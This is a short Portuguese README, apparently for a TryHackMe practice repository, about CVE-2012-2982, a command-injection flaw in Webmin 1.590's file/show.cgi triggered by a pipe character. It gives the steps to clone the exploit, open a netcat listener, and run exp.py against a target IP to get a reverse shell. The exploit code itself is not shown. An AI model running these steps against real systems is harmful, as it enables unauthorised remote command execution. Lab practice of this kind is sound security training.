
Pratique a criação de scripts POC no quarto introdutório de scripting POC do Tryhackme (Para Linux)
file/show.cgi no Webmin 1.590 e anteriores permite que usuários autenticados remotos executem comandos arbitrários através de um caractere inválido em um nome de caminho, como demonstrado por um caractere | (pipe).
git clone https://github.com/CpyRe/CVE-2012-2982.gitpip3 install -r requirements.txtnc -nlvp <port>python3 exp.py <myip> <vulnip> <port>
OU
python3 subprocess-exp.py <myip> <vulnip> <port>